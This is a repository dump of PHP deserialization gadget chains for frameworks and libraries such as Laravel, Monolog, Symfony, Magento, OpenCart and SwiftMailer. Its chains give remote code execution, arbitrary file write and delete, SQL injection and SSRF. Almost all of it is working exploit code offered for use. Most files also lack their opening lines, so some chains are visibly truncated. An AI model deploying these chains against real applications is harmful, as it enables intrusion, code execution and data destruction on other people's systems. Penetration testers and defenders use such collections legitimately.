--------------------------------------------------------------------------------
1 | events = new \Faker\ValidGenerator($function, $param);
11 | }
12 | }
13 | }
14 |
15 | namespace Faker {
16 | class ValidGenerator
17 | {
18 | protected $generator;
19 | protected $maxRetries;
20 | protected $validator;
21 |
22 | function __construct($function, $param)
23 | {
24 | $this->maxRetries = 1;
25 | $this->validator = $function;
26 | $this->generator = new \Faker\DefaultGenerator($param);
27 | }
28 | }
29 |
30 | class DefaultGenerator
31 | {
32 | protected $default;
33 |
34 | function __construct($param)
35 | {
36 | $this->default = $param;
37 | }
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/15/chain.php:
--------------------------------------------------------------------------------
1 | filename = new \Illuminate\Validation\Rules\RequiredIf($code);
12 | }
13 | }
14 | }
15 |
16 | namespace Illuminate\Validation\Rules {
17 | class RequiredIf
18 | {
19 | public $condition;
20 |
21 | public function __construct($code)
22 | {
23 | $this->condition = [
24 | new \PHPUnit\Framework\MockObject\Generator\MockTrait($code),
25 | "generate"
26 | ];
27 | }
28 | }
29 | }
30 |
31 | namespace PHPUnit\Framework\MockObject\Generator
32 | {
33 | class MockTrait
34 | {
35 | private $classCode;
36 | private $mockName;
37 |
38 | function __construct($classCode)
39 | {
40 | $this->classCode = $classCode;
41 | $this->mockName = "asd";
42 | }
43 | }
44 | }
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/19/chain.php:
--------------------------------------------------------------------------------
1 | initialTtyMode = ";".$command.";#";
10 | }
11 | }
12 | }
13 |
14 | namespace Illuminate\View {
15 | class InvokableComponentVariable
16 | {
17 | public $callable;
18 |
19 | function __construct($command)
20 | {
21 | $this->callable = array(new \Laravel\Prompts\Terminal($command),'restoreTty');
22 | }
23 | }
24 | }
25 |
26 | namespace Illuminate\Support {
27 | class Sleep
28 | {
29 | public $shouldSleep;
30 | public $duration;
31 |
32 | function __construct($command)
33 | {
34 | $this->shouldSleep = true;
35 | $this->duration = new \Illuminate\View\InvokableComponentVariable($command);
36 | }
37 | }
38 | }
39 |
40 |
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | events = $events;
13 | $this->event = $parameter;
14 | }
15 | }
16 | }
17 |
18 |
19 | namespace Illuminate\Events
20 | {
21 | class Dispatcher
22 | {
23 | protected $listeners;
24 |
25 | function __construct($function, $parameter)
26 | {
27 | $this->listeners = [
28 | $parameter => [$function]
29 | ];
30 | }
31 | }
32 | }
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/20/chain.php:
--------------------------------------------------------------------------------
1 | events = $events;
12 | }
13 | }
14 | }
15 |
16 |
17 | namespace Illuminate\Notifications
18 | {
19 | class ChannelManager
20 | {
21 | protected $app;
22 | protected $defaultChannel;
23 | protected $customCreators;
24 |
25 | function __construct($function, $parameter)
26 | {
27 | $this->app = $parameter;
28 | $this->customCreators = ['x' => $function];
29 | $this->defaultChannel = 'x';
30 | }
31 | }
32 | }
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/4/chain.php:
--------------------------------------------------------------------------------
1 | events = $events;
13 | $this->event = $event;
14 | }
15 | }
16 | }
17 |
18 |
19 | namespace Illuminate\Validation
20 | {
21 | class Validator
22 | {
23 | public $extensions;
24 |
25 | function __construct($function)
26 | {
27 | $this->extensions = ['' => $function];
28 | }
29 | }
30 | }
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/5/chain.php:
--------------------------------------------------------------------------------
1 | ';
18 | return new \Illuminate\Broadcasting\PendingBroadcast($code);
19 | }
20 | }
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/6/chain.php:
--------------------------------------------------------------------------------
1 | ';
21 | $expected = new \Illuminate\Broadcasting\PendingBroadcast($code);
22 | $res = new \Illuminate\Support\MessageBag($expected);
23 | return $res;
24 |
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/7/chain.php:
--------------------------------------------------------------------------------
1 | events = new \Illuminate\Bus\Dispatcher($function);
13 | $this->event = new \Illuminate\Queue\CallQueuedClosure($parameter);
14 | }
15 | }
16 | }
17 |
18 | namespace Illuminate\Bus
19 | {
20 | class Dispatcher
21 | {
22 | protected $queueResolver;
23 |
24 | public function __construct($function)
25 | {
26 | $this->queueResolver = $function;
27 |
28 | }
29 | }
30 | }
31 |
32 | namespace Illuminate\Queue
33 | {
34 | class CallQueuedClosure
35 | {
36 | protected $connection;
37 |
38 | public function __construct($parameter)
39 | {
40 | $this->connection = $parameter;
41 | }
42 | }
43 | }
44 |
45 |
46 |
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/8/chain.php:
--------------------------------------------------------------------------------
1 | filename = $r;
12 | }
13 | }
14 | }
15 |
16 | namespace Illuminate\Validation\Rules
17 | {
18 | class RequiredIf
19 | {
20 | public function __construct($p)
21 | {
22 | $this->condition = [$p, 'get'];
23 | }
24 | }
25 | }
26 |
27 | namespace PhpOption
28 | {
29 | final class LazyOption
30 | {
31 | private $callback;
32 | private $arguments;
33 |
34 | function __construct($callback, $arguments)
35 | {
36 | $this->callback = $callback;
37 | $this->arguments = $arguments;
38 | }
39 | }
40 | }
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/9/chain.php:
--------------------------------------------------------------------------------
1 | queueResolver = $function;
21 |
22 | }
23 | }
24 | }
25 |
26 | namespace Illuminate\Broadcasting
27 | {
28 | use Illuminate\Contracts\Queue\ShouldQueue;
29 |
30 | class BroadcastEvent implements ShouldQueue
31 | {
32 | function __construct()
33 | {
34 |
35 | }
36 | }
37 |
38 | class PendingBroadcast
39 | {
40 | protected $events;
41 | protected $event;
42 |
43 | function __construct($dispatcher,$param)
44 | {
45 | $this->event = new BroadcastEvent();
46 | $this->event->connection = $param;
47 | $this->events = $dispatcher;
48 | }
49 | }
50 | }
51 |
52 |
--------------------------------------------------------------------------------
/gadgetchains/Magento/FW/1/chain.php:
--------------------------------------------------------------------------------
1 | is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.';
11 |
12 | public function generate(array $parameters)
13 | {
14 | $parameters = parent::process_parameters($parameters);
15 |
16 | $file = $parameters['remote_path'];
17 | $payload = $parameters['data'];
18 |
19 | return new \Zend_Memory_Manager($file, $payload);
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/gadgetchains/Magento/SQLI/1/chain.php:
--------------------------------------------------------------------------------
1 | driver = new \Magento\Framework\Filesystem\Driver\File();
11 | }
12 | }
13 | }
14 |
15 | namespace Magento\RemoteStorage\Plugin {
16 | class Image {
17 | public function __construct($file) {
18 | $this->tmpDirectoryWrite = new \Magento\Framework\Filesystem\Directory\Write();
19 | $this->tmpFiles = [$file];
20 | }
21 | }
22 | }
23 |
--------------------------------------------------------------------------------
/gadgetchains/Magento2/FD/2/chain.php:
--------------------------------------------------------------------------------
1 | driver = new \Magento\Framework\Filesystem\Driver\File();
19 | }
20 | }
21 | }
22 |
23 | namespace Magento\RemoteStorage\Model
24 | {
25 | class TmpFileCopier
26 | {
27 | public $tmpFiles;
28 | public $tmpDirectoryWrite;
29 |
30 | public function __construct($file)
31 | {
32 | $this->tmpFiles = ['1' => $file];
33 | $this->tmpDirectoryWrite = new \Magento\RemoteStorage\Model\Filesystem\Directory\Write();
34 | }
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/FW/1/chain.php:
--------------------------------------------------------------------------------
1 | null]
20 | )
21 | );
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/1/gadgets.php:
--------------------------------------------------------------------------------
1 | socket = $x;
12 | }
13 | }
14 |
15 | class BufferHandler
16 | {
17 | protected $handler;
18 | protected $bufferSize = -1;
19 | protected $buffer;
20 | # ($record['level'] < $this->level) == false
21 | protected $level = null;
22 | protected $initialized = true;
23 | # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false
24 | protected $bufferLimit = -1;
25 | protected $processors;
26 |
27 | function __construct($methods, $command)
28 | {
29 | $this->processors = $methods;
30 | $this->buffer = [$command];
31 | $this->handler = $this;
32 | }
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | null]
20 | )
21 | );
22 | }
23 | }
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/2/gadgets.php:
--------------------------------------------------------------------------------
1 | socket = $x;
14 | }
15 | }
16 |
17 | class BufferHandler
18 | {
19 | protected $handler;
20 | protected $bufferSize = -1;
21 | protected $buffer;
22 | # ($record['level'] < $this->level) == false
23 | protected $level = null;
24 | protected $initialized = true;
25 | # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false
26 | protected $bufferLimit = -1;
27 | protected $processors;
28 |
29 | function __construct($methods, $command)
30 | {
31 | $this->processors = $methods;
32 | $this->buffer = [$command];
33 | $this->handler = $this;
34 | }
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/3/chain.php:
--------------------------------------------------------------------------------
1 | null]
19 | );
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/3/gadgets.php:
--------------------------------------------------------------------------------
1 | processors = $methods;
17 |
18 | }
19 | }
20 |
21 | class BufferHandler
22 | {
23 | protected $handler;
24 | protected $bufferSize = -1;
25 | protected $buffer;
26 |
27 | # ($record['level'] < $this->level) == false
28 | protected $level = null;
29 | protected $bubble = false;
30 | protected $formatter = null;
31 | protected $processors;
32 |
33 | function __construct($methods, $command)
34 | {
35 | $this->processors = null;
36 | $this->buffer = [$command];
37 | $this->handler = new NativeMailerHandler($methods);
38 | }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/4/chain.php:
--------------------------------------------------------------------------------
1 | __destruct() => close() => flushBuffer() => handleBatch($records)
7 |
8 | class FingersCrossedHandler {
9 | protected $passthruLevel;
10 | protected $buffer = array();
11 | protected $handler;
12 |
13 | public function __construct($param, $handler)
14 | {
15 | $this->passthruLevel = 0;
16 | $this->buffer = ['test' => [$param, 'level' => null]];
17 | $this->handler = $handler;
18 | }
19 |
20 | }
21 |
22 | class GroupHandler {
23 | protected $processors = array();
24 | public function __construct($function)
25 | {
26 | $this->processors = ['current', $function];
27 | }
28 |
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/6/chain.php:
--------------------------------------------------------------------------------
1 | 0]
20 | );
21 | }
22 | }
23 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/7/gadgets.php:
--------------------------------------------------------------------------------
1 | processors = $methods;
14 | $this->buffer = [$command];
15 | $this->handler = $this;
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/gadgetchains/Monolog/RCE/8/chain.php:
--------------------------------------------------------------------------------
1 | processors = ['get_object_vars', 'end', $function];
15 | $this->buffer = [new \Monolog\LogRecord($parameter)];
16 | $this->handler = $this;
17 | }
18 | }
19 | }
20 |
21 | namespace Monolog
22 | {
23 | enum Level: int
24 | {
25 | case Debug = 100;
26 | }
27 |
28 | class LogRecord
29 | {
30 | public Level $level = \Monolog\Level::Debug;
31 | public mixed $formatted;
32 |
33 | function __construct($parameter)
34 | {
35 | $this->mixed = $parameter;
36 | }
37 | }
38 | }
--------------------------------------------------------------------------------
/gadgetchains/OpenCart/FW/1/chain.php:
--------------------------------------------------------------------------------
1 | connection = $connection;
12 | }
13 | }
14 | }
15 |
16 | namespace Opencart\System\Library
17 | {
18 | class Session
19 | {
20 | protected object $adaptor;
21 | protected string $session_id;
22 |
23 | public function __construct($adaptor, $session_id)
24 | {
25 | $this->adaptor = $adaptor;
26 | $this->session_id = $session_id;
27 | }
28 | }
29 |
30 | class Log
31 | {
32 | private string $file;
33 |
34 | public function __construct($file) {
35 | $this->file = $file;
36 | }
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/gadgetchains/OpenCart/FW/2/chain.php:
--------------------------------------------------------------------------------
1 | connection = $connection;
12 | }
13 | }
14 | }
15 |
16 | namespace {
17 | class Session
18 | {
19 | protected object $adaptor;
20 | protected string $session_id;
21 | public $data;
22 |
23 | public function __construct($adaptor, $session_id, $data)
24 | {
25 | $this->adaptor = $adaptor;
26 | $this->session_id = $session_id;
27 | $this->data = $data;
28 | }
29 | }
30 | }
31 |
32 | namespace Twig\Cache
33 | {
34 | class FilesystemCache
35 | {
36 |
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/gadgetchains/OpenCart/FW/3/chain.php:
--------------------------------------------------------------------------------
1 | connection = $connection;
12 | }
13 | }
14 | }
15 |
16 | namespace {
17 | class Session
18 | {
19 | protected object $adaptor;
20 | protected string $session_id;
21 | public $data;
22 |
23 | public function __construct($adaptor, $session_id, $data)
24 | {
25 | $this->adaptor = $adaptor;
26 | $this->session_id = $session_id;
27 | $this->data = $data;
28 | }
29 | }
30 |
31 | class Twig_Cache_Filesystem
32 | {
33 | // for OpenCart 3.0.3.3 or older.
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/gadgetchains/OpenCart/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | connection = $connection;
12 | }
13 | }
14 | }
15 |
16 | namespace Opencart\System\Library
17 | {
18 | class Session
19 | {
20 | protected object $adaptor;
21 | protected string $session_id;
22 |
23 | public function __construct($adaptor, $session_id)
24 | {
25 | $this->adaptor = $adaptor;
26 | $this->session_id = $session_id;
27 | }
28 | }
29 | }
30 |
31 | namespace Opencart\System\Engine
32 | {
33 | Class Proxy
34 | {
35 | protected $data = [];
36 |
37 | public function __construct($key, $function)
38 | {
39 | $this->data[$key] = $function;
40 | }
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/gadgetchains/OpenCart/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | files = [$remote_path => $remote_path];
12 |
13 | }
14 |
15 | }
16 | }
17 |
18 | /*
19 | public function __destruct()
20 | {
21 | $this->clean();
22 | }
23 |
24 |
25 |
26 |
27 | public function clean()
28 | {
29 | foreach ($this->files as $file => $value) {
30 | $this->unlink($file);
31 | }
32 | $this->files = [];
33 | }
34 |
35 | private function unlink($path)
36 | {
37 | @unlink($path);
38 | }
39 | }
40 | */
41 |
42 |
43 | ?>
44 |
--------------------------------------------------------------------------------
/gadgetchains/PHPCSFixer/FD/2/chain.php:
--------------------------------------------------------------------------------
1 | fileName = $filePath;
10 | }
11 |
12 | /*
13 | public function __destruct() {
14 | if (!is_null($this->fileHandle)) {
15 | fclose($this->fileHandle); // Will only produce a warning
16 | unlink($this->fileName);
17 | }
18 | $this->fileHandle = null;
19 | }
20 | */
21 | }
--------------------------------------------------------------------------------
/gadgetchains/PHPExcel/FD/2/chain.php:
--------------------------------------------------------------------------------
1 | _fileName = $filePath;
10 | }
11 |
12 | /*
13 | public function __destruct() {
14 | if (!is_null($this->_fileHandle)) {
15 | fclose($this->_fileHandle); // Will only produce a warning
16 | unlink($this->_fileName);
17 | }
18 | $this->_fileHandle = null;
19 | } // function __destruct()
20 | */
21 | }
--------------------------------------------------------------------------------
/gadgetchains/PHPExcel/FD/3/chain.php:
--------------------------------------------------------------------------------
1 | tempFileName = $filePath;
9 | }
10 |
11 | /*
12 | public function __destruct()
13 | {
14 | // Unlink temporary files
15 | if ($this->tempFileName != '') {
16 | @unlink($this->tempFileName);
17 | }
18 | }
19 | */
20 | }
--------------------------------------------------------------------------------
/gadgetchains/PHPExcel/FD/4/chain.php:
--------------------------------------------------------------------------------
1 | _tempFileName = $filePath;
9 | }
10 |
11 | /*
12 | public function __destruct()
13 | {
14 | // Unlink temporary files
15 | if ($this->_tempFileName != '') {
16 | @unlink($this->_tempFileName);
17 | }
18 | }
19 | */
20 | }
--------------------------------------------------------------------------------
/gadgetchains/PHPSecLib/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | crypto = $a;
12 | }
13 | }
14 | }
15 |
16 | namespace phpseclib\Crypt
17 | {
18 | class Base
19 | {
20 | var $block_size;
21 | var $inline_crypt;
22 | var $use_inline_crypt = 1;
23 | var $changed = 0;
24 | var $engine = 1;
25 | var $mode = 1;
26 |
27 | public function __construct($t)
28 | {
29 | if (strpos(get_class($this), 'AES'))
30 | $this->inline_crypt = [$t, '_createInlineCryptFunction'];
31 | else
32 | $this->block_size = '1){}}}; ob_clean();' . $t . 'die(); ?>';
33 | }
34 | }
35 |
36 | class AES extends Base
37 | {
38 | var $bitmap = 1;
39 | var $crypto = 1;
40 | }
41 |
42 | class TripleDES extends Base
43 | {
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/gadgetchains/PHPWord/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | tempFileName = $remote_path;
11 | }
12 |
13 | }
--------------------------------------------------------------------------------
/gadgetchains/Phalcon/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | cookiesFile = $path;
9 | }
10 | }
11 |
--------------------------------------------------------------------------------
/gadgetchains/Plates/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | = 3.6.0';
7 | public static $vector = '__toString';
8 | public static $author = 'Tris0n';
9 |
10 | public function generate(array $parameters)
11 | {
12 | $function = $parameters['function'];
13 | $parameter = $parameters['parameter'];
14 |
15 | return new \League\Plates\Template\Template(
16 | new \League\Plates\Template\Template(
17 | new \League\Plates\Engine(
18 | new \League\Plates\Template\Functions(
19 | new \League\Plates\Template\Func(
20 | $function
21 | )
22 | )
23 | )
24 | ),
25 | $parameter
26 | );
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/gadgetchains/Pydio/Guzzle/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | [ new \Pydio\Core\Controller\ShutDownScheduler($function, $parameter), 'callRegisteredShutdown']
18 | ]);
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/gadgetchains/Pydio/Guzzle/RCE/1/gadgets.php:
--------------------------------------------------------------------------------
1 | methods = $methods;
16 |
17 | foreach ($methods as $name => $fn) {
18 | $this->{'_fn_' . $name} = $fn;
19 | }
20 | }
21 | }
22 | }
23 |
24 | namespace Pydio\Core\Controller
25 | {
26 | class ShutdownScheduler
27 | {
28 | private $callbacks;
29 | public function __construct($function, $parameter) {
30 | $this->callbacks = [[$function, $parameter]];
31 | }
32 | }
33 | }
34 |
35 |
36 |
--------------------------------------------------------------------------------
/gadgetchains/Silverstripe/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | image->destroy();
15 | // However Symfony hardcodes a .mocksess suffix on the path which makes this
16 | // not particularly useful.
17 |
18 | public function generate(array $parameters)
19 | {
20 | return new \SilverStripe\Assets\InterventionBackend($parameters['remote_path']);
21 | }
22 | }
23 |
--------------------------------------------------------------------------------
/gadgetchains/Silverstripe/FD/1/gadgets.php:
--------------------------------------------------------------------------------
1 | tempPath = $tempPath;
11 | }
12 | }
13 | }
--------------------------------------------------------------------------------
/gadgetchains/Slim/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | keys = $this->raw = $this->values = $array;
14 | }
15 | }
16 | }
17 |
18 | namespace Slim
19 | {
20 | class App
21 | {
22 | private $container;
23 |
24 | function __construct($container)
25 | {
26 | $this->container = $container;
27 | }
28 | }
29 |
30 | class Container extends \Pimple\Container
31 | {
32 |
33 | }
34 | }
35 |
36 | namespace Slim\Http
37 | {
38 | use \Slim\App;
39 | use \Slim\Container;
40 |
41 | abstract class Message
42 | {
43 | protected $headers;
44 | protected $body = '';
45 |
46 | function __construct($function, $parameter)
47 | {
48 | $z = new App(new Container(['has' => $function]));
49 | $y = new App($z);
50 | $this->headers = new App(new Container(['all' => [$y, $parameter]]));
51 | }
52 | }
53 |
54 | class Response extends Message
55 | {
56 |
57 | }
58 | }
--------------------------------------------------------------------------------
/gadgetchains/Smarty/FD/1/chain.php:
--------------------------------------------------------------------------------
1 |
23 |
--------------------------------------------------------------------------------
/gadgetchains/Smarty/SSRF/1/gadgets.php:
--------------------------------------------------------------------------------
1 | handler = new SoapClient(null, [
9 | 'uri' => $res['scheme'] . '://' . $res['host'] . '/',
10 | 'location' => $url
11 | ]);
12 | }
13 | }
14 |
15 | class Smarty
16 | {
17 | public $cache_locking = true;
18 | }
19 |
20 | class Smarty_Internal_Template
21 | {
22 | public $cached;
23 | public $smarty;
24 |
25 | public function __construct($url)
26 | {
27 | $this->smarty = new Smarty();
28 | $this->cached = new Smarty_Template_Cached($url);
29 | }
30 | }
31 | ?>
32 |
--------------------------------------------------------------------------------
/gadgetchains/Snappy/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | temporaryFiles, $remote_path);
11 | }
12 |
13 | }
--------------------------------------------------------------------------------
/gadgetchains/Spiral/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | finalizer = new \Spiral\Boot\Finalizer($function,$param);
12 | }
13 | }
14 | }
15 |
16 | namespace Spiral\Boot
17 | {
18 | class Finalizer
19 | {
20 | private $finalizers;
21 |
22 | function __construct($function,$param)
23 | {
24 | $this->finalizers = [[new \PhpOption\LazyOption($function,$param),"get"]];
25 | }
26 | }
27 | }
28 |
29 | namespace PhpOption
30 | {
31 | class LazyOption
32 | {
33 | private $callback;
34 | private $arguments;
35 |
36 | public function __construct($function,$parameter)
37 | {
38 | $this->callback = $function;
39 | $this->arguments = [$parameter];
40 | }
41 | }
42 | }
--------------------------------------------------------------------------------
/gadgetchains/SwiftMailer/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | path = $path;
10 | }
11 | }
12 |
13 | class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream
14 | {
15 | public function __construct($path)
16 | {
17 | parent::__construct($path);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/gadgetchains/SwiftMailer/FD/2/chain.php:
--------------------------------------------------------------------------------
1 | _cacheKey = $path_a[count($path_a) - 2];
12 | $pre_index = strripos($path, "/");
13 | $pre = substr($path, 0, $pre_index - strlen($this->_cacheKey) - 1);
14 |
15 | $this->_cache = new Swift_KeyCache_DiskKeyCache(
16 | $pre, $path_a[count($path_a) - 2], $path_a[count($path_a) - 1]
17 | );
18 | }
19 | }
20 |
21 | class Swift_KeyCache_DiskKeyCache
22 | {
23 | private $_path;
24 | private $_keys;
25 |
26 | public function __construct($pre_path, $path, $filename)
27 | {
28 | $this->_path = $pre_path;
29 | $this->_keys = [$path => [$filename => '']];
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/gadgetchains/SwiftMailer/FR/1/chain.php:
--------------------------------------------------------------------------------
1 | _buffer = $_buffer;
20 | $this->_eventDispatcher = $_eventDispatcher;
21 | }
22 | }
23 |
24 | abstract class Swift_ByteStream_AbstractFilterableInputStream
25 | {
26 | private $_filters = array();
27 | private $_writeBuffer;
28 |
29 | function __construct($_writeBuffer)
30 | {
31 | $this->_writeBuffer = $_writeBuffer;
32 | }
33 | }
34 |
35 | class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream
36 | {
37 | private $_path;
38 | private $_mode = 'w+b';
39 |
40 | function __construct($_path, $_writeBuffer)
41 | {
42 | parent::__construct($_writeBuffer);
43 | $this->_path = $_path;
44 | }
45 | }
--------------------------------------------------------------------------------
/gadgetchains/Symfony/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | tmp = $path;
8 | }
9 | }
10 | }
11 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/FW/1/chain.php:
--------------------------------------------------------------------------------
1 | state = 1;
23 | $this->skippedFile = 'php://filter/convert.base64-decode/resource=' . $path;
24 | $this->isSkipped = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' . base64_encode($data);
25 | }
26 | }
27 | }
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | deferred = $command;
36 | $this->namespace = [];
37 | }
38 | }
39 |
40 | class ApcuAdapter extends AbstractAdapter
41 | {
42 | }
43 | }
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/10/chain.php:
--------------------------------------------------------------------------------
1 | headers = $headers;
12 | }
13 | }
14 | }
15 |
16 | namespace Symfony\Component\Finder\Iterator
17 | {
18 | class SortableIterator
19 | {
20 | private $iterator;
21 | private $sort;
22 |
23 | function __construct($iterator, $sort)
24 | {
25 | $this->iterator = $iterator;
26 | $this->sort = $sort;
27 | }
28 | }
29 | }
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/11/chain.php:
--------------------------------------------------------------------------------
1 | parentData = $parentData;
15 | }
16 |
17 | public function serialize()
18 | {
19 | return serialize([null, $this->parentData]);
20 | }
21 |
22 | public function unserialize($serialized)
23 | {
24 | }
25 | }
26 | }
27 |
28 | namespace Symfony\Component\Validator {
29 | class ConstraintViolationList
30 | {
31 | private $violations;
32 |
33 | public function __construct($violations)
34 | {
35 | $this->violations = $violations;
36 | }
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/12/chain.php:
--------------------------------------------------------------------------------
1 | $parameters['parameter']));
16 |
17 | // a rmdir($path . '/' $cacheKey) will be done by Swift_KeyCache_DiskKeyCache::clearAll()
18 | // so put something that will never exists to avoid issues
19 | $path = "thispathshouldneverexists";
20 | $cache = new \Swift_KeyCache_DiskKeyCache($keys, $path);
21 |
22 | return $cache;
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/12/gadgets.php:
--------------------------------------------------------------------------------
1 | _keys = $keys;
11 | $this->_path = $path;
12 | }
13 | }
14 |
15 | class sfOutputEscaperArrayDecorator
16 | {
17 | protected $value;
18 |
19 | protected $escapingMethod;
20 |
21 | public function __construct($escapingMethod, $value) {
22 | $this->escapingMethod = $escapingMethod;
23 | $this->value = $value;
24 | }
25 | }
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/13/chain.php:
--------------------------------------------------------------------------------
1 | prop = $prop;
10 | }
11 |
12 | public function serialize()
13 | {
14 | return serialize($this->prop);
15 | }
16 |
17 | public function unserialize($serialized)
18 | {
19 | }
20 | }
21 |
22 | class sfOutputEscaperArrayDecorator
23 | {
24 | protected $value;
25 |
26 | protected $escapingMethod;
27 |
28 | public function __construct($escapingMethod, $value) {
29 | $this->escapingMethod = $escapingMethod;
30 | $this->value = $value;
31 | }
32 | }
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/14/chain.php:
--------------------------------------------------------------------------------
1 | dateString = $dateString;
11 | $this->tzString = $tzString;
12 | }
13 | }
14 |
15 |
16 | class sfOutputEscaperObjectDecorator
17 | {
18 | protected $value;
19 |
20 | protected $escapingMethod;
21 |
22 | public function __construct($escapingMethod, $value) {
23 | $this->escapingMethod = $escapingMethod;
24 | $this->value = $value;
25 | }
26 | }
27 |
28 | class sfCultureInfo
29 | {
30 | protected $dataFileExt = '.dat';
31 | protected $data = array();
32 | protected $culture;
33 | protected $dataDir;
34 | protected $dataFiles = array();
35 | protected $dateTimeFormat;
36 | protected $numberFormat;
37 | protected $properties = array();
38 |
39 | public function __construct($culture) {
40 | $this->culture = $culture;
41 | }
42 |
43 | }
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/15/chain.php:
--------------------------------------------------------------------------------
1 | escapingMethod = $escapingMethod;
11 | $this->value = $value;
12 | }
13 | }
14 |
15 | class MySQLiTableInfo
16 | {
17 |
18 | protected $name;
19 | protected $columns = array();
20 | protected $foreignKeys = array();
21 | protected $indexes = array();
22 | protected $primaryKey;
23 | protected $pkLoaded = false;
24 | protected $fksLoaded = false;
25 | protected $indexesLoaded = false;
26 | protected $colsLoaded = false;
27 | protected $vendorLoaded = false;
28 | protected $vendorSpecificInfo = array();
29 | protected $conn;
30 | protected $database;
31 | protected $dblink;
32 | protected $dbname;
33 |
34 | public function __construct($columns)
35 | {
36 | $this->columns = $columns;
37 | }
38 | }
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/16/chain.php:
--------------------------------------------------------------------------------
1 | escapingMethod = $escapingMethod;
12 | $this->value = $value;
13 | }
14 | }
15 |
16 | class sfNamespacedParameterHolder implements Serializable
17 | {
18 | protected $prop = null;
19 |
20 | public function __construct($prop)
21 | {
22 | $this->prop = $prop;
23 | }
24 |
25 | public function serialize()
26 | {
27 | return serialize($this->prop);
28 | }
29 |
30 | public function unserialize($serialized)
31 | {
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | )';
11 |
12 | public function generate(array $parameters)
13 | {
14 | $code = $parameters['code'];
15 |
16 | return new \Symfony\Component\Process\ProcessPipes(
17 | new \Symfony\Component\Finder\Expression\Expression(
18 | new \Symfony\Component\Templating\PhpEngine(
19 | new \Symfony\Component\Templating\Storage\StringStorage(
20 | $code
21 | ))));
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/2/gadgets.php:
--------------------------------------------------------------------------------
1 | template = '';
8 | }
9 | }
10 | }
11 |
12 | namespace Symfony\Component\Templating{
13 | class TemplateNameParser{}
14 | class TemplateReference{}
15 | class PhpEngine{
16 | protected $parser;
17 | protected $cache;
18 | protected $current;
19 | protected $globals = array();
20 | public function __construct($s){
21 | $this->parser = new TemplateNameParser;
22 | $this->current = new TemplateReference;
23 | $this->cache = array(NULL=>$s);
24 | }
25 | }
26 | }
27 |
28 | namespace Symfony\Component\Finder\Expression{
29 | class Expression{
30 | private $value;
31 | public function __construct($p){
32 | $this->value = $p;
33 | }
34 | }
35 | }
36 |
37 | namespace Symfony\Component\Process{
38 | class ProcessPipes{
39 | private $files = array();
40 | public function __construct($e){
41 | $this->files = array($e);
42 | }
43 | }
44 | }
45 |
46 | ?>
47 |
